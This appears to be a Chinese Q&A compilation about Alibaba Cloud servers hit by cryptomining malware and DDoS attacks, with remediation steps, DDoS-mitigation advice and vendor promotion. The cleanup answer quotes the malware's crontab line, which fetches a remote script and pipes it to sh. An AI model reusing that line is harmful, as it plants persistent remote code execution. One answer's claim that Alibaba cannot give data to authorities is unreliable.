當前位置:首頁 » 礦機知識 » 阿里雲伺服器被別人當礦機

阿里雲伺服器被別人當礦機

發布時間: 2023-01-25 22:13:47

『壹』 伺服器放在阿里雲安全嗎會被黑客修改數據嗎

1.技術層面上,雲伺服器租賃服務屬於IaaS

依據《信息安全技術雲計算服務安全指南》,雲計算行業服務分為IaaS、PaaS、SaaS。IaaS,基礎設施即服務,主要提供電腦基礎設施和虛擬設備等,主要用戶是系統管理員,阿里雲是典型的IaaS。在IaaS模式中,雲服務提供者僅有技術能力對伺服器進行整體關停或空間釋放(即「強行刪除伺服器內全部數據」),而對用戶利用雲基礎設施開設的網站和網路應用中存儲的具體信息無法進行直接控制。而信息存儲空間服務實際上是則是綜合門戶平台、電商平台、媒體平台、網盤等利用了雲計算服務租用伺服器後對外提供的服務。兩者對信息的控制能力不同。

2.法律層面上,雲計算拿的是第一類增值電信業務許可

根據《電信業務分類目錄》阿里雲公司提供的雲伺服器租賃服務屬於「互聯網數據中心業務(B11)」,與提供「互聯網接入服務業務(B14)」的中國聯通、中國電信等同屬於「第一類增值電信業務」,屬於底層網路技術服務,而信息存儲空間服務屬於該目錄中「第二類增值電信業務」中的「信息服務業務(B25)」。
因此,作為用戶不需過度擔心自身企業的數據安全問題。

阿里雲的雲伺服器租賃服務不同於信息存儲空間服務,阿里雲無權調取伺服器內的數據,更無權配合行政、司法部門提供數據。信息存儲空間服務是指網路服務提供者為服務對象提供信息存儲空間,供服務對象通過信息網路向公眾提供作品、表演、錄音錄像製品。

『貳』 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權, 在沒有找到根源前,千萬不要刪除 minerd,因為刪除了,過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top,查看了一會,沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句:

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下,感興趣的可以研究下:

View Code

解決minerd並不是最終的目的,主要是要查找問題根源,我的伺服器問題出在了redis服務了,黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權,http://blog.jobbole.com/94518/然後就注入了病毒,下面是解決辦法和清除工作:

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」,區分普通用戶和admin許可權,普通用戶將會被禁止運行某些命令,如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表,是不是有你不認識的用戶添加進來。 如果有就刪除掉.

『叄』 阿里雲買的伺服器被黑了怎麼辦

阿里雲伺服器遭受大流量攻擊而進入黑洞,所有來自外部的流量都會被丟棄,黑洞期間,伺服器的外網訪問將被屏蔽。最好的解決方法就是清洗流量,先換ip,新換的ip不要泄露出去,然後找第三方進行流量清洗,這個過程要注意硬防和只能防的區別,最好是智能防護,將流量損失降到最低!

『肆』 阿里雲伺服器被攻擊-

根據全球 游戲 和全球移動互聯網行業第三方分析機構Newzoo的數據顯示:2017年上半年,中國以275億美元的 游戲 市場收入超過美國和日本,成為全球榜首。

游戲 行業的快速發展、高額的攻擊利潤、日趨激烈的行業競爭,讓中國 游戲 行業的進軍者們,每天都面臨業務和安全的雙重挑戰。

游戲 行業一直是競爭、攻擊最為復雜的一個江湖。 曾經多少充滿激情的創業團隊、玩法極具特色的 游戲 產品,被互聯網攻擊的問題扼殺在搖籃里;又有多少運營出色的 游戲 產品,因為遭受DDoS攻擊,而一蹶不振。

DDoS 攻擊的危害

小蟻安盾安全發布的2017年上半年的 游戲 行業DDoS攻擊態勢報告中指出:2017年1月至2017年6月, 游戲 行業大於300G以上的攻擊超過1800次,攻擊最大峰值為608G; 游戲 公司每月平均被攻擊次數高達800餘次。

目前, 游戲 行業因DDoS攻擊引發的危害主要集中在以下幾點:

• 90%的 游戲 業務在被攻擊後的2-3天內會徹底下線。

• 攻擊超過2-3天以上,玩家數量一般會從幾萬人下降至幾百人。

• 遭受DDoS攻擊後, 游戲 公司日損失可達數百萬元。

為什麼 游戲 行業是 DDoS 攻擊的重災區?

據統計表明,超過50%的DDoS和CC攻擊,都在針對 游戲 行業。 游戲 行業成為攻擊的重災區,主要有以下幾點原因:

• 游戲 行業的攻擊成本低,幾乎是防護成本的1/N,攻防兩端極度不平衡。 隨著攻擊方的手法日趨復雜、攻擊點的日趨增多,靜態防護策略已無法達到較好的效果,從而加劇了這種不平衡。

• 游戲 行業生命周期短。 一款 游戲 從出生到消亡,大多隻有半年的時間,如果抗不過一次大的攻擊,很可能就死在半路上。黑客也是瞄中了這一點,認定只要發起攻擊, 游戲 公司一定會給保護費。

• 游戲 行業對連續性的要求很高,需要7 24小時在線。 因此如果受到DDoS攻擊,很容易會造成大量的玩家流失。在被攻擊的2-3天後,玩家數量從幾萬人掉到幾百人的事例屢見不鮮。

• 游戲 公司之間的惡性競爭,也加劇了針對行業的DDoS攻擊。

游戲 行業的 DDoS 攻擊類型

• 空連接 攻擊者與伺服器頻繁建立TCP連接,佔用服務端的連接資源,有的會斷開、有的則一直保持。空連接攻擊就好比您開了一家飯館,黑幫勢力總是去排隊,但是並不消費,而此時正常的客人也會無法進去消費。

• 流量型攻擊 攻擊者採用UDP報文攻擊伺服器的 游戲 埠,影響正常玩家的速度。用飯館的例子,即流量型攻擊相當於黑幫勢力直接把飯館的門給堵了。

• CC攻擊 攻擊者攻擊伺服器的認證頁面、登錄頁面、 游戲 論壇等。還是用飯館的例子,CC攻擊相當於,壞人霸佔收銀台結賬、霸佔服務員點菜,導致正常的客人無法享受到服務。

• 假人攻擊 模擬 游戲 登錄和創建角色過程,造成伺服器人滿為患,影響正常玩家。

• 對玩家的DDoS攻擊 針對對戰類 游戲 ,攻擊對方玩家的網路使其 游戲 掉線或者速度慢。

• 對網關DDoS攻擊 攻擊 游戲 伺服器的網關,導致 游戲 運行緩慢。

• 連接攻擊 頻繁的攻擊伺服器,發送垃圾報文,造成伺服器忙於解碼垃圾數據。

游戲 安全痛點

• 業務投入大,生命周期短 一旦出現若干天的業務中斷,將直接導致前期的投入化為烏有。

• 缺少為安全而准備的資源 游戲 行業玩家多、資料庫和帶寬消耗大、基礎設施資源准備時間長,而安全需求往往沒有被 游戲 公司優先考慮。

• 可被攻擊的薄弱點多 網關、帶寬、資料庫、計費系統都可能成為 游戲 行業攻擊的突破口,相關的存儲系統、域名DNS系統、CDN系統等也會遭受攻擊。

• 涉及的協議種類多 難以使用同一套防禦模型去識別攻擊並加以防護,許多 游戲 伺服器多用加密私有協議,難以用通用的挑戰機制進行驗證。

• 實時性要求高,需要7 24小時在線 業務不能中斷,成為DDoS攻擊容易奏效的理由。

• 行業惡性競爭現象猖獗 DDoS攻擊成為打倒競爭對手的工具。

如何判斷已遭受 DDoS 攻擊?

假定已排除線路和硬體故障的情況下,突然發現連接伺服器困難、正在 游戲 的用戶掉線等現象,則說明您很有可能是遭受了DDoS攻擊。

目前, 游戲 行業的IT基礎設施一般有 2 種部署模式:一種是採用雲計算或者託管IDC模式,另外一種是自行部署網路專線。無論是前者還是後者接入,正常情況下, 游戲 用戶都可以自由流暢地進入伺服器並進行 游戲 娛樂 。因此,如果突然出現以下幾種現象,可以基本判斷是被攻擊狀態:

• 主機的IN/OUT流量較平時有顯著的增長。

• 主機的CPU或者內存利用率出現無預期的暴漲。

• 通過查看當前主機的連接狀態,發現有很多半開連接;或者是很多外部IP地址,都與本機的服務埠建立幾十個以上的ESTABLISHED狀態的連接,則說明遭到了TCP多連接攻擊。

• 游戲 客戶端連接 游戲 伺服器失敗或者登錄過程非常緩慢。

• 正在進行 游戲 的用戶突然無法操作、或者非常緩慢、或者總是斷線。

DDoS 攻擊緩解最佳實踐

目前,有效緩解DDoS攻擊的方法可分為 3 大類:

• 架構優化

• 伺服器加固

• 商用的DDoS防護服務

您可根據自己的預算和遭受攻擊的嚴重程度,來決定採用哪些安全措施。

架構優化

在預算有限的情況下,建議您優先從自身架構的優化和伺服器加固上下功夫,減緩DDoS攻擊造成的影響。


部署 DNS 智能解析

通過智能解析的方式優化DNS解析,有效避免DNS流量攻擊產生的風險。同時,建議您託管多家DNS服務商。

• 屏蔽未經請求發送的DNS響應信息 典型的DNS交換信息是由請求信息組成的。DNS解析器會將用戶的請求信息發送至DNS伺服器中,在DNS伺服器對查詢請求進行處理之後,伺服器會將響應信息返回給DNS解析器。
但值得注意的是,響應信息是不會主動發送的。伺服器在沒有接收到查詢請求之前,就已經生成了對應的響應信息,這些回應就應被丟棄。

• 丟棄快速重傳數據包 即便是在數據包丟失的情況下,任何合法的DNS客戶端都不會在較短的時間間隔內向同一DNS伺服器發送相同的DNS查詢請求。如果從相同IP地址發送至同一目標地址的相同查詢請求發送頻率過高,這些請求數據包可被丟棄。

• 啟用TTL 如果DNS伺服器已經將響應信息成功發送了,應該禁止伺服器在較短的時間間隔內對相同的查詢請求信息進行響應。
對於一個合法的DNS客戶端,如果已經接收到了響應信息,就不會再次發送相同的查詢請求。每一個響應信息都應進行緩存處理直到TTL過期。當DNS伺服器遭遇大量查詢請求時,可以屏蔽掉不需要的數據包。

• 丟棄未知來源的DNS查詢請求和響應數據 通常情況下,攻擊者會利用腳本對目標進行分布式拒絕服務攻擊(DDoS攻擊),而且這些腳本通常是有漏洞的。因此,在伺服器中部署簡單的匿名檢測機制,在某種程度上可以限制傳入伺服器的數據包數量。

• 丟棄未經請求或突發的DNS請求 這類請求信息很可能是由偽造的代理伺服器所發送的,或是由於客戶端配置錯誤或者是攻擊流量。無論是哪一種情況,都應該直接丟棄這類數據包。
非泛洪攻擊 (non-flood) 時段,可以創建一個白名單,添加允許伺服器處理的合法請求信息。白名單可以屏蔽掉非法的查詢請求信息以及此前從未見過的數據包。
這種方法能夠有效地保護伺服器不受泛洪攻擊的威脅,也能保證合法的域名伺服器只對合法的DNS查詢請求進行處理和響應。

• 啟動DNS客戶端驗證 偽造是DNS攻擊中常用的一種技術。如果設備可以啟動客戶端驗證信任狀,便可以用於從偽造泛洪數據中篩選出非泛洪數據包。

• 對響應信息進行緩存處理 如果某一查詢請求對應的響應信息已經存在於伺服器的DNS緩存之中,緩存可以直接對請求進行處理。這樣可以有效地防止伺服器因過載而發生宕機。

• 使用ACL的許可權 很多請求中包含了伺服器不具有或不支持的信息,可以進行簡單的阻斷設置。例如,外部IP地址請求區域轉換或碎片化數據包,直接將這類請求數據包丟棄。

• 利用ACL,BCP38及IP信譽功能 託管DNS伺服器的任何企業都有用戶軌跡的限制,當攻擊數據包被偽造,偽造請求來自世界各地的源地址。設置一個簡單的過濾器可阻斷不需要的地理位置的IP地址請求或只允許在地理位置白名單內的IP請求。
同時,也存在某些偽造的數據包可能來自與內部網路地址的情況,可以利用BCP38通過硬體過濾清除異常來源地址的請求。

部署負載均衡

通過部署負載均衡(SLB)伺服器有效減緩CC攻擊的影響。通過在SLB後端負載多台伺服器的方式,對DDoS攻擊中的CC攻擊進行防護。

部署負載均衡方案後,不僅具有CC攻擊防護的作用,也能將訪問用戶均衡分配到各個伺服器上,減少單台伺服器的負擔,加快訪問速度。

使用專有網路

通過網路內部邏輯隔離,防止來自內網肉雞的攻擊。

提供餘量帶寬

通過伺服器性能測試,評估正常業務環境下能承受的帶寬和請求數,確保流量通道不止是日常的量,有一定的帶寬餘量可以有利於處理大規模攻擊。

伺服器安全加固

在伺服器上進行安全加固,減少可被攻擊的點,增大攻擊方的攻擊成本:

• 確保伺服器的系統文件是最新的版本,並及時更新系統補丁。

• 對所有伺服器主機進行檢查,清楚訪問者的來源。

• 過濾不必要的服務和埠。例如,WWW伺服器,只開放80埠,將其他所有埠關閉,或在防火牆上做阻止策略。

• 限制同時打開的SYN半連接數目,縮短SYN半連接的timeout時間,限制SYN/ICMP流量。

• 仔細檢查網路設備和伺服器系統的日誌。一旦出現漏洞或是時間變更,則說明伺服器可能遭到了攻擊。

• 限制在防火牆外與網路文件共享。降低黑客截取系統文件的機會,若黑客以特洛伊木馬替換它,文件傳輸功能無疑會陷入癱瘓。

• 充分利用網路設備保護網路資源。在配置路由器時應考慮以下策略的配置:流控、包過濾、半連接超時、垃圾包丟棄,來源偽造的數據包丟棄,SYN 閥值,禁用ICMP和UDP廣播。

• 通過iptable之類的軟體防火牆限制疑似惡意IP的TCP新建連接,限制疑似惡意IP的連接、傳輸速率。

• 識別 游戲 特徵,自動將不符合 游戲 特徵的連接斷開。

• 防止空連接和假人攻擊,將空連接的IP地址直接加入黑名單。

• 配置學習機制,保護 游戲 在線玩家不掉線。例如,通過伺服器搜集正常玩家的信息,當面對攻擊時,將正常玩家導入預先准備的伺服器,並暫時放棄新進玩家的接入,以保障在線玩家的 游戲 體驗。

商用 DDoS 攻擊解決方案

針對超大流量的攻擊或者復雜的 游戲 CC攻擊,可以考慮採用專業的DDoS解決方案。目前,通用的 游戲 行業安全解決方案做法是在IDC機房前端部署防火牆或者流量清洗的一些設備,或者採用大帶寬的高防機房來清洗攻擊。

當寬頻資源充足時,此技術模式的確是防禦 游戲 行業DDoS攻擊的有效方式。不過帶寬資源有時也會成為瓶頸:例如單點的IDC很容易被打滿,對 游戲 公司本身的成本要求也比較高。

DDoS攻擊解決方案——高防IP

新式高防技術,替身式防禦,具備4Tbps高抗D+流量清洗功能,無視DDoS,CC攻擊,不用遷移數據,隱藏源伺服器IP,只需將網站解析記錄修改為小蟻DDoS高防IP,將攻擊引流至小蟻集群替身高防伺服器,是攻擊的IP過濾清洗攔截攻擊源,正常訪問的到源伺服器,保證網站快速訪問或伺服器穩定可用,接入半小時後,即可正式享受高防服務。

『伍』 阿里雲允許用雲主機挖礦嗎

是可以的。很多挖礦項目都可以使用雲伺服器,例如最近火熱的Swarm bzz。但Swarm白皮書沒有提供挖礦的硬體配置推薦,然而目前,因為各類硬體采購價格高、到貨慢,然而時間不等人!綜合對比下來,針對BZZ挖礦,推薦雲伺服器!
像Swarm BZZ這樣的去中心化存儲的情況下,以太坊生態中的熱點數據每秒都在隨時被調用和存儲,所以除了CPU、內存和硬碟這三個主要的響應能力之外,還有一個要求寬頻傳輸速度。
使用雲伺服器來部署bzz節點,核心理由就是一個字「快」,節點早一分鍾上線,就能更早的獲取到頭礦!
經西部數碼上千bzz節點部署的實踐經驗證明,bzz節點需要較高的帶寬和超強的磁碟IO性能,以下是結合資源實際消耗情況合理搭配的配置。
4核CPU + 4G內存 + 100G SSD硬碟 + 20M帶寬。上述配置,可以部署一個節點。
如果需要部署多節點可以選擇多台這樣的雲伺服器,或者選擇更高配置的雲伺服器,如16核CPU + 24G內存 + 500G SSD硬碟 + 200M帶寬,可部署5-10個節點。

『陸』 阿里雲伺服器太不安全了,老是被攻擊,工作人員就負責把伺服器給我關了

阿里雲提供基礎設施服務,按需取用伺服器資源,但是安全防禦企業自身也一定要重視起來,不要以為上雲了之後就絕對安全了,阿里雲提供最高5g的免費防禦ddos流量攻擊,如果安全策略做得更高則需要購買高防ip。
你這個情況應該是受到攻擊並沒有更好的安全措施,當攻擊達到一定程度,工作人員會將其關閉,以防遭受到更大的損失。

『柒』 伺服器被攻擊了,攻擊阿里雲報告如圖,請問該如何分析呢

伺服器被攻擊了,攻擊阿里雲報告,分析如下。
1、使用阿里雲的伺服器用戶多,阿里雲的主機在國內市場佔有率確實高,有4成用戶都在使用阿里雲伺服器。
2、阿里雲主機免費防禦小,阿里雲國內伺服器默認免費防禦5G,香港的更小,只有2G,甚至不提供DDOS防禦,這點防禦力在攻擊方面前成本可以忽略不計。
3、阿里雲不能換IP的特點一直傳承到現在,還是沒解決,只有購買DDOS高防後才給換一次。

『捌』 阿里雲伺服器是不是經常捉鬼放鬼

你這都是猜測,理由說不過去。我不知道你是多大的客戶需要阿里雲對你特殊對待,要知道阿里雲安全產品的價格可是很高的啊,他確定你買得起嗎?
阿里雲支持按量付費伺服器,被攻擊的時候伺服器並不會關閉,只是網路不通,但是「內網」是通暢的,臨時開一台按量付費伺服器做個埠轉發就行了。從發現中斷到重新上線通常不超過10分鍾,如果你們有開發人員的話,接入阿里雲的產品API,從被攻擊下線到重新上線能控制在2-3分鍾。我向來都是這么解決的,一年下來被攻擊幾十次,全年額外支出成本也不超過50塊人民幣,幹嘛和阿里雲較真,再說你毛的證據沒有,頂多就來這里發發牢騷而已。

『玖』 阿里雲伺服器剛買兩天就被攻擊當肉雞,黑客怎麼做到的

您這伺服器是被黑客入侵了,被黑的因素 一般都是程序留了後門或vps內被留了系統內核級別的木馬 或網站的代碼留了隱蔽性的木馬或一句話shell
一般都是網站程序存在漏洞或者伺服器存在漏洞而被攻擊了
伺服器被黑是每個網站管理員最頭痛的問題 也可以通過安全公司來解決,國內也就Sinesafe和綠盟等安全公司 比較專業.

『拾』 阿里雲的伺服器給攻擊了,這種問題怎麼解決

伺服器受攻擊的方式主要有以下幾種:
1.數據包洪水攻擊
一種中斷伺服器或本地網路的方法是數據包洪水攻擊,它通常使用Internet控制報文協議(ICMP)包或是UDP包。

2.磁碟攻擊
這是一種更殘忍的攻擊,它不僅僅影響目標計算機的通信,還破壞其硬體。偽造的用戶請求利用寫命令攻擊目標計算機的硬碟,讓其超過極限,並強制關閉。

3.路由不可達
通常,DoS攻擊集中在路由器上,攻擊者首先獲得控制權並操縱目標機器。當攻擊者能夠更改路由器的路由表條目的時候,會導致整個網路不可達。這種攻擊是非常陰險的,因為它開始出現的時候往往令人莫名其妙。

熱點內容
調研組在調研btc天 發布:2025-05-18 04:19:18 瀏覽:556
數字貨幣ddm是什麼意思 發布:2025-05-18 04:14:59 瀏覽:266
怎麼算摩擦力的能量 發布:2025-05-18 04:13:26 瀏覽:694
幣印礦池dcr算力驟減 發布:2025-05-18 04:11:52 瀏覽:646
虛擬貨幣唯有茅台和比特幣 發布:2025-05-18 03:56:07 瀏覽:944
比特幣挖礦不是浪費錢 發布:2025-05-18 03:51:32 瀏覽:403
usdt如何賣出人民幣 發布:2025-05-18 03:43:08 瀏覽:417
元宇宙區塊鏈代幣yyz 發布:2025-05-18 03:42:28 瀏覽:419
測繪次新元宇宙 發布:2025-05-18 02:37:55 瀏覽:970
比特幣轉讓幣手續 發布:2025-05-18 02:37:53 瀏覽:204